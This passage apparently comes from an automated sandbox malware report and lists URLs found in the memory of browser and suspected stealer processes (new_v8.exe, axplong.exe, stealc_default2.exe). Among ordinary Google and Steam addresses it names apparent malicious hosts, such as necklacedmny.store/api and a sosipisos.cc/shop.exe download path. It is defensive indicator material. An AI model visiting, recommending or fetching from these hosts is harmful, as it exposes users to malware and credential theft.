Source: chrome.exe, 0000002B.00000003.2259650975.0000229800390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2259947837.000022980039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2703786753.000022980080C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google-ohttp-relay-safebrowsing.fastly-edge.com/bJ
Source: chrome.exe, 0000002B.00000002.2704034525.00002B3C00064000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2758943906.00002B3C001C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google.com/
Source: chrome.exe, 0000002B.00000002.2758943906.00002B3C001C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google.com/googleapis.com
Source: new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://help.steampowered.com/
Source: new_v8.exe, 00000016.00000003.2158662833.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://help.steampowered.com/en/
Source: 550b7cfe5f.exe, 0000002A.00000003.2541102427.0000000000F4F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqWfpl%2B4pbW4pbWfpbW7ReNxR3UIG8zInwYIFIVs9e
Source: chrome.exe, 0000002B.00000003.2364448765.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2771549895.00002B3C00C3C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2365195742.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/161903006
Source: chrome.exe, 0000002B.00000003.2364448765.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2771549895.00002B3C00C3C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2365195742.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/166809097
Source: chrome.exe, 0000002B.00000003.2364448765.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2771549895.00002B3C00C3C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2365195742.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/184850002
Source: chrome.exe, 0000002B.00000003.2364448765.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2771549895.00002B3C00C3C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2365195742.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/187425444
Source: chrome.exe, 0000002B.00000003.2364448765.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2771549895.00002B3C00C3C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2365195742.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/220069903
Source: chrome.exe, 0000002B.00000003.2364448765.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2771549895.00002B3C00C3C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2365195742.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/229267970
Source: chrome.exe, 0000002B.00000003.2364448765.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2771549895.00002B3C00C3C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2365195742.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/250706693
Source: chrome.exe, 0000002B.00000003.2364448765.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2771549895.00002B3C00C3C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2365195742.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/253522366
Source: chrome.exe, 0000002B.00000003.2364448765.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2771549895.00002B3C00C3C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2365195742.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/255411748
Source: chrome.exe, 0000002B.00000003.2364448765.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2771549895.00002B3C00C3C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2365195742.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/258207403
Source: chrome.exe, 0000002B.00000003.2364448765.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2771549895.00002B3C00C3C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2365195742.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/274859104
Source: chrome.exe, 0000002B.00000003.2364448765.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2771549895.00002B3C00C3C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2365195742.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/284462263
Source: chrome.exe, 0000002B.00000003.2364448765.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2771182366.00002B3C00BE4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2365195742.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/issues/166475273
Source: chrome.exe, 0000002B.00000002.2703455932.0000229800770000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2259947837.000022980039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2703786753.000022980080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2700906047.0000229800238000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://labs.google.com/search/experiment/2
Source: chrome.exe, 0000002B.00000002.2703455932.0000229800770000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2767972444.00002B3C009E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2700906047.0000229800238000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://labs.google.com/search/experiment/2/springboard
Source: chrome.exe, 0000002B.00000003.2259650975.0000229800390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2259947837.000022980039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2703786753.000022980080C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://labs.google.com/search/experiment/2/springboard2
Source: chrome.exe, 0000002B.00000003.2259650975.0000229800390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2259947837.000022980039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2703786753.000022980080C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://labs.google.com/search/experiment/2/springboardb
Source: chrome.exe, 0000002B.00000002.2703455932.0000229800770000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://labs.google.com/search/experiment/2/springboardhttps://labs.google.com/search/experiments
Source: chrome.exe, 0000002B.00000002.2703455932.0000229800770000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2259947837.000022980039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2703786753.000022980080C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://labs.google.com/search/experiments
Source: chrome.exe, 0000002B.00000003.2265759074.00002298006E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2703422989.0000229800744000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2703524503.000022980078C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2269345057.00002298006EC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lens.google.com/v3/upload
Source: chrome.exe, 0000002B.00000003.2259650975.0000229800390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2259947837.000022980039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2703786753.000022980080C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lens.google.com/v3/upload2
Source: new_v8.exe, 00000016.00000003.2149512471.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159976456.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.steampowered.com/
Source: new_v8.exe, 00000016.00000003.2149512471.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2415792676.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159976456.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://lv.queniujq.cn
Source: chrome.exe, 0000002B.00000002.2758943906.00002B3C001C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://m.google.com/devicemanagement/data/api
Source: new_v8.exe, 00000016.00000003.2149512471.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159976456.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://medal.tv
Source: chrome.exe, 0000002B.00000002.2760324094.00002B3C0045C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2763383332.00002B3C00734000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://myaccount.google.com/?utm_source=ga-chrome-actions&utm_medium=manageGA
Source: chrome.exe, 0000002B.00000002.2764280996.00002B3C00830000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2760324094.00002B3C0045C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://myaccount.google.com/data-and-privacy?utm_source=ga-chrome-actions&utm_medium=managePrivacy
Source: chrome.exe, 0000002B.00000002.2764280996.00002B3C00830000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2760324094.00002B3C0045C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://myaccount.google.com/find-your-phone?utm_source=ga-chrome-actions&utm_medium=findYourPhone
Source: chrome.exe, 0000002B.00000002.2764280996.00002B3C00830000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2760324094.00002B3C0045C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://myaccount.google.com/signinoptions/password?utm_source=ga-chrome-actions&utm_medium=changePW
Source: 550b7cfe5f.exe, 0000002A.00000002.3474564441.0000000000F46000.00000004.00000020.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.3443810612.0000000000F46000.00000004.00000020.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2461071670.0000000000EE9000.00000004.00000020.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2541102427.0000000000F4F000.00000004.00000020.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.3443481489.0000000000EE0000.00000004.00000020.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.3444015191.0000000000EE0000.00000004.00000020.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000002.3474153244.0000000000EE0000.00000004.00000020.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2398275478.0000000000F49000.00000004.00000020.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2461039118.0000000000F4F000.00000004.00000020.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2345731366.0000000000F49000.00000004.00000020.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.3087852951.0000000000F4F000.00000004.00000020.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2345680824.0000000000F4F000.00000004.00000020.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2461647337.0000000000F51000.00000004.00000020.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2512885460.0000000000F4F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://necklacedmny.store/
Source: 550b7cfe5f.exe, 0000002A.00000003.2592238207.0000000000F51000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://necklacedmny.store/F
Source: 550b7cfe5f.exe, 0000002A.00000002.3474564441.0000000000F46000.00000004.00000020.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.3443810612.0000000000F46000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://necklacedmny.store/N
Source: 550b7cfe5f.exe, 0000002A.00000002.3473998772.0000000000E8E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://necklacedmny.store/O
Source: 550b7cfe5f.exe, 0000002A.00000003.2512885460.0000000000F4F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://necklacedmny.store/api
Source: 550b7cfe5f.exe, 0000002A.00000003.2461039118.0000000000F4F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://necklacedmny.store/apiB
Source: 550b7cfe5f.exe, 0000002A.00000003.3109929770.0000000000F46000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://necklacedmny.store/apiX
Source: 550b7cfe5f.exe, 0000002A.00000003.3109929770.0000000000F46000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://necklacedmny.store/apip
Source: 550b7cfe5f.exe, 0000002A.00000003.2541102427.0000000000F4F000.00000004.00000020.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2512885460.0000000000F4F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://necklacedmny.store/f
Source: 550b7cfe5f.exe, 0000002A.00000003.3443481489.0000000000EE0000.00000004.00000020.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.3444015191.0000000000EE0000.00000004.00000020.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000002.3474153244.0000000000EE0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://necklacedmny.store:443/api
Source: chrome.exe, 0000002B.00000002.2758943906.00002B3C001C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://oauthaccountmanager.googleapis.com/
Source: chrome.exe, 0000002B.00000002.2759036713.00002B3C0020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://oauthaccountmanager.googleapis.com/v1/issuetoken
Source: new_v8.exe, 00000016.00000003.2149512471.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159976456.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://player.vimeo.com
Source: new_v8.exe, 00000016.00000003.2149512471.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159976456.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://recaptcha.net
Source: new_v8.exe, 00000016.00000003.2149512471.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159976456.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://recaptcha.net/recapt
Source: new_v8.exe, 00000016.00000003.2149512471.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159976456.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://s.ytimg.com;
Source: chrome.exe, 0000002B.00000002.2704034525.00002B3C00064000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://safebrowsing.google.com/safebrowsing/clientreport/chrome-sct-auditing
Source: chrome.exe, 0000002B.00000002.2704034525.00002B3C00064000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://sctauditing-pa.googleapis.com/v1/knownscts/length/$1/prefix/$2?key=AIzaSyBOti4mM-6x9WDnZIjIe
Source: chrome.exe, 0000002B.00000002.2758943906.00002B3C001C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://securitydomain-pa.googleapis.com/v1/
Source: new_v8.exe, 00000016.00000003.2149512471.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159976456.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sketchfab.com
Source: axplong.exe, 0000000D.00000002.3764499174.0000000006190000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sosipisos.cc/
Source: axplong.exe, 0000000D.00000002.3764499174.0000000006190000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sosipisos.cc/shop.exeeK
Source: axplong.exe, 0000000D.00000002.3764499174.0000000006190000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sosipisos.cc/shop.exezKU
Source: new_v8.exe, 00000016.00000003.2149512471.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159976456.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steam.tv/
Source: new_v8.exe, 00000016.00000003.2149512471.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159976456.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steambroadcast-test.akamaized.net
Source: new_v8.exe, 00000016.00000003.2149512471.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159976456.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steambroadcast.akamaized.net
Source: new_v8.exe, 00000016.00000003.2149512471.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2415792676.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159976456.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steambroadcastchat.akamaized.net
Source: new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149512471.0000000000B4E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/
Source: new_v8.exe, 00000016.00000003.2158662833.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
Source: new_v8.exe, 00000016.00000003.2158662833.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/discussions/
Source: new_v8.exe, 00000016.00000003.2149512471.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159976456.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2158662833.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149512471.0000000000B4E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
Source: new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
Source: new_v8.exe, 00000016.00000003.2158662833.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/market/
Source: new_v8.exe, 00000016.00000003.2158662833.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/my/wishlist/
Source: new_v8.exe, 00000016.00000003.2159125127.0000000000B50000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2415792676.0000000000B51000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149512471.0000000000B4E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900
Source: new_v8.exe, 00000016.00000003.2855159283.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149512471.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2415792676.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159976456.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2158662833.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
Source: new_v8.exe, 00000016.00000003.2159125127.0000000000B50000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149512471.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159976456.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2158662833.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149512471.0000000000B4E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
Source: new_v8.exe, 00000016.00000003.2159125127.0000000000B50000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2415792676.0000000000B51000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149512471.0000000000B4E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900bf
Source: new_v8.exe, 00000016.00000003.2158662833.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/workshop/
Source: new_v8.exe, 00000016.00000003.2855159283.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149512471.0000000000B71000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowere
Source: new_v8.exe, 00000016.00000003.2415792676.0000000000B71000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowere&
Source: new_v8.exe, 00000016.00000003.2159976456.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowereW
Source: new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/
Source: new_v8.exe, 00000016.00000003.2149512471.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159976456.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/;
Source: new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/about/
Source: new_v8.exe, 00000016.00000003.2158662833.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/explore/
Source: new_v8.exe, 00000016.00000003.2149512471.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2415792676.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159976456.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2158662833.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149512471.0000000000B4E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/legal/
Source: new_v8.exe, 00000016.00000003.2158662833.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/mobile
Source: new_v8.exe, 00000016.00000003.2158662833.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/news/
Source: new_v8.exe, 00000016.00000003.2158662833.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/points/shop/
Source: new_v8.exe, 00000016.00000003.2158662833.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/privacy_agreement/
Source: new_v8.exe, 00000016.00000003.2158662833.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/stats/
Source: new_v8.exe, 00000016.00000003.2158662833.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/steam_refunds/
Source: new_v8.exe, 00000016.00000003.2158662833.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/subscriber_agreement/
Source: 550b7cfe5f.exe, 0000002A.00000003.2515107023.0000000005ADE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: 550b7cfe5f.exe, 0000002A.00000003.2515107023.0000000005ADE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: stealc_default2.exe, 00000011.00000003.2103880354.000000002D5AA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.S3DiLP_FhcLK
Source: chrome.exe, 0000002B.00000002.2768140159.00002B3C00A18000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://t0.gstatic.com/faviconV2
